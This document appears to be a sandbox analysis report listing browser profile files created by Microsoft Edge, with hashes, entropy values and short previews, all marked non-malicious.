                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                                      MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                                      SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                                      SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                                      SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.45462295891366744
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:90lD8QiD25g0WyB6x5PkcRtRVEbNDkvI5PDi0gyyqFumo8ng1HF:yD8N4/6xdkcR6Jw6LgyyqFumo8naH
                                                                                                                                                                                                                                                                                                      MD5:13FA8C3DA521CEBAE756E12C497CA255
                                                                                                                                                                                                                                                                                                      SHA1:18778CCC052368A403EDCFE6CC90C5BDD689D30B
                                                                                                                                                                                                                                                                                                      SHA-256:5CFFD5E4DA7F7A63DC1B0A2CA35F8F4C4FB0610FA1F3478F88B791EC673C24D4
                                                                                                                                                                                                                                                                                                      SHA-512:B89C76C16C0618C2A0B51B81F01BE04017AE4B9B2AE54F57D23205DE5BE06133C916040AEED31915BBF831C2724887785687077A4C2FEFCF31F2BFD0388F661A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                                                      MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                                                      SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                                                      SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                                                      SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.567736491219251
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9861
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.106103229085298
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17732), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):17734
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.483354904707707
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40504
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.561481478994447
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17895), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):17897
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.480046313370604
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.245844312420478
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:02.414 13b8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/23-11:15:02.465 13b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):2163821
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.222861401021413
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.097337254685604
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:x4L9SwDM+q2PN723oH+Tcwt9Eh1tIFUt8s4LLwgZmw+s4LHDMVkwON723oH+Tcw+:x4LDM+vVaYeb9Eh16FUt8s4/wg/+s4TX
                                                                                                                                                                                                                                                                                                      MD5:3BB797DC1763F1F64555739982164AAE
                                                                                                                                                                                                                                                                                                      SHA1:E5D22BBC64DF7BA8B345C8A9824FF3561161109B
                                                                                                                                                                                                                                                                                                      SHA-256:C7C1DAA89D35D13E2E4C7F4E508E03F1E588DC74D38979285C1A3B51F26B31FB
                                                                                                                                                                                                                                                                                                      SHA-512:1C97CCCA325F1A6826F9807C4F1051A0BCF63B7D4EDA2EF36D8B7EBD6E0CCF5D5EAA397DB0B452F9666FCF778EBAC24F7D3B3EE5620F112691B87850DE03CED8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:02.339 3fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-11:15:02.341 3fc Recovering log #3.2024/12/23-11:15:02.348 3fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4628023887711355
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu6hlhW:TouQq3qh7z3bY2LNW9WMcUvBu6hbW
                                                                                                                                                                                                                                                                                                      MD5:9E52C1F9037D7CE870DA9C16DB5F6263
                                                                                                                                                                                                                                                                                                      SHA1:6161B753CE92E14160F9691871FDBE07A3696384
                                                                                                                                                                                                                                                                                                      SHA-256:A969D61A8461078E02B3D993982583DA6D994461B1B384C3DD6F0D4AAA46A9A9
                                                                                                                                                                                                                                                                                                      SHA-512:4821FA19C48B56362082846004A52855414597B1921B710FF4F93AF885FA4BA8CFB17D4974730ED030101DE866729DEC9E1A938D9F26E9251AA0AB98EC157727
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2229665746316725
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHtQ+q2PN723oH+TcwtnG2tMsIFUt8sOHgFkSgZmw+sOHgFkSQVkwON723oH+TR:xaHvVaYebn9GFUt8sagS/+sage5OaYeV
                                                                                                                                                                                                                                                                                                      MD5:B13FA7169E3CB56ABF801D5986A3EFB7
                                                                                                                                                                                                                                                                                                      SHA1:500A857382BF5D933E8B62F2A6BD26482F83312B
                                                                                                                                                                                                                                                                                                      SHA-256:682F5266097B0ACB48A01F57C9B7A684B01E2A15E060ABF3A9C00420951E0D5C
                                                                                                                                                                                                                                                                                                      SHA-512:9BAEA6E6D02AF3EDB9140B1AB717267B818A4D2BF891B11D9DA2A13D82A870AE8C53BEAB9F7497EAF4F2EA23B9E02BD8D0715374503AC5BCF9FACDA8E8141AAF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.587 1888 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-11:14:56.588 1888 Recovering log #3.2024/12/23-11:14:56.588 1888 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6130787838604517
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jrNUlpk9mL:TO8D4jJ/6Up+H0
                                                                                                                                                                                                                                                                                                      MD5:69427C44825D9A4450EFD625F5CA181C
                                                                                                                                                                                                                                                                                                      SHA1:C0FAEF275349A5F57A50D769B5098FFFF793DBE0
                                                                                                                                                                                                                                                                                                      SHA-256:4A34F4F409085227905BED26D67F5833C221066D57658D15E2B370F5DF513865
                                                                                                                                                                                                                                                                                                      SHA-512:AB2EACAE9DA0F84B11019FEA94D12992068737AA4F075B2F49ED481F8DC988810848D7D22197F56BFB21FDEEE33E25A202FB81D199B2B9B849A5C9D01652E011
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.354147422341582
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:nA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:nFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                      MD5:70697135B9D5858366B42B8247CF5E69
                                                                                                                                                                                                                                                                                                      SHA1:1CEA98DC54C61D431AACDE34E5641B1D572A0CE9
                                                                                                                                                                                                                                                                                                      SHA-256:5F1FD9E2BBFE49DC4C3807FF21E2FB785C464B291B48894C23AD61A994F42443
                                                                                                                                                                                                                                                                                                      SHA-512:C9AB146D19FD35254ADFB6A0C984B34488CF097FF35905D61BC01E5C769E97F310C9C600AD58796401DA4FB8DE75A7F9E248106120DE7BB7D3E8D3B6A5C9EF1D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379444105010953..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.151583747034428
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:x4LXLM1N723oH+Tcwtk2WwnvB2KLlb4LRS2I34q2PN723oH+Tcwtk2WwnvIFUv:x4DLsaYebkxwnvFLp4lG4vVaYebkxwnp
                                                                                                                                                                                                                                                                                                      MD5:29A03F1A1AF81B8DEB7FDF05CD706F25
                                                                                                                                                                                                                                                                                                      SHA1:E90C78FB8A3EF8969ABBF2E821734F1456AE9275
                                                                                                                                                                                                                                                                                                      SHA-256:D6936CEC07E5BB1B11C787EB9486F4DA8D26B19BECABB2086E792C00C1BF18C3
                                                                                                                                                                                                                                                                                                      SHA-512:9AD59ACF62F3BB44C1468A179F42EE28FB4C0F3B66B6E96F29A0FBE19A7A70091974FAF7E575035503B3E35CA770E63C6B4C6C26417B9DDBD7D84A9A8ACDC0C9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:02.358 8c4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/23-11:15:02.477 8c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324614382099393
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RK:C1gAg1zfvi
                                                                                                                                                                                                                                                                                                      MD5:D385D780131A67C39C64CEF771211DE1
                                                                                                                                                                                                                                                                                                      SHA1:4E1FE2FB7E8CE2789A35B864FC2BADC722E763D3
                                                                                                                                                                                                                                                                                                      SHA-256:B9EE43FABF727E6DB0EF9F6CABFE30EE949F092525F18AD13196D011AB02BEEF
                                                                                                                                                                                                                                                                                                      SHA-512:A4C9269CC3F934F45E7CBBD1F42ED442ACEA0FC303AA28C001E67FF382C940A38B3F367C9ED5713F0992C3EFE2294F405A7981B948707E4685F09D7C307C3F4B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
